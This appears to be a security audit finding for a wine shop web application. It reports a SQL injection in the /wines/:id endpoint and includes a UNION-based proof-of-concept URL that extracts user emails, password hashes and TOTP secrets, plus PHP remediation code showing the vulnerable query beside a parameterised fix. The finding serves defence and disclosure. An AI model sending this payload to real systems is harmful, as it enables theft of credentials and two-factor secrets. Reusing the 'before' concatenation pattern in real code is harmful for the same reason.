Vuln ID: TP-002
Title: SQL Injection - Wine Detail (ID in URL)
Severity: critical
Type: SQLi
HTTP Method: GET
URL: /wines/:id
Parameter: id
Filename: -
Code Location: backend/api/models/Wine.php -> getByIdDirect() line 89

Description

The wine ID taken from the URL path is concatenated directly into the SQL query text in getByIdDirect() instead of being bound as a parameter. The route does not constrain :id to digits, so a non-numeric value reaches the query unchanged and is interpreted as SQL. Because the result of the query is rendered in the wine detail response, an attacker can use a UNION to read arbitrary tables; the proof of concept below pulls email, password_hash, totp_secret and is_admin from the users table, which is what justifies the critical rating.

Proof of Concept

GET /wines/0 UNION SELECT 1,email,password_hash,name,5,6,7,8,totp_secret,is_admin,11,12,13,14,15 FROM users--

When sending the request, the spaces in the path must be URL-encoded (%20). The id value 0 is chosen so that no real wine row is returned and only the UNION rows are rendered; the number of selected expressions (15) must match the column count of the wines table or the database rejects the UNION. The trailing -- comments out the remainder of the original query.

Remediation

Use a parameterized query with the id bound as an integer. Validate the path parameter as a positive integer before it reaches the model (or constrain the route to \d+) and return 400 for anything else, so the database never sees a non-numeric id. With PDO on MySQL, also disable emulated prepares (PDO::ATTR_EMULATE_PREPARES = false) so the statement is prepared server-side rather than interpolated client-side.
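The vulnerable pattern beside its hardened replacement, as an added example in PHP that is not the project's code. The class and method names mirror the finding's code location but are reconstructed; the $pdo connection, the wines table layout (integer primary key id) and the handleWineDetail controller are assumptions.

```php
<?php
// Added example, not code from backend/api/models/Wine.php.
// Assumes: a PDO connection injected as $pdo, a `wines` table whose primary key
// `id` is an integer, and a framework-agnostic controller (handleWineDetail).

class Wine
{
    private PDO $pdo;

    public function __construct(PDO $pdo)
    {
        $this->pdo = $pdo;
        // Server-side prepares: the value is sent separately from the SQL text,
        // so the driver never splices it into the query string.
        $this->pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
        $this->pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    }

    // BEFORE (vulnerable, reconstructed from the finding's description):
    // the raw route parameter becomes part of the SQL text, so
    // "0 UNION SELECT ... FROM users--" is executed as written.
    public function getByIdDirect(string $id): ?array
    {
        $sql = "SELECT * FROM wines WHERE id = " . $id;
        $row = $this->pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }

    // AFTER: validate as an integer, then bind with PDO::PARAM_INT.
    // The bound value can only ever be compared against `id`; it cannot
    // change the structure of the statement.
    public function getById(string $id): ?array
    {
        // FILTER_VALIDATE_INT rejects "0 UNION ...", "1.0", "1e3" and "0x1A";
        // min_range excludes 0 and negatives, which are never valid ids here.
        $intId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($intId === false) {
            throw new InvalidArgumentException('wine id must be a positive integer');
        }

        $stmt = $this->pdo->prepare('SELECT * FROM wines WHERE id = :id');
        $stmt->bindValue(':id', $intId, PDO::PARAM_INT);
        $stmt->execute();

        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    }
}

// Assumed controller: turn a validation failure into a 400 at the boundary
// instead of letting it reach the database or leak as a 500.
function handleWineDetail(Wine $model, string $id): void
{
    header('Content-Type: application/json');
    try {
        $wine = $model->getById($id);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo json_encode(['error' => 'invalid wine id']);
        return;
    }

    if ($wine === null) {
        http_response_code(404);
        echo json_encode(['error' => 'wine not found']);
        return;
    }

    echo json_encode($wine);
}
```

With this in place the proof-of-concept request never reaches the query: filter_var() rejects the payload and the controller answers 400. Even if validation were bypassed, the PDO::PARAM_INT binding means the database receives a single integer, not SQL text, so the UNION has no effect.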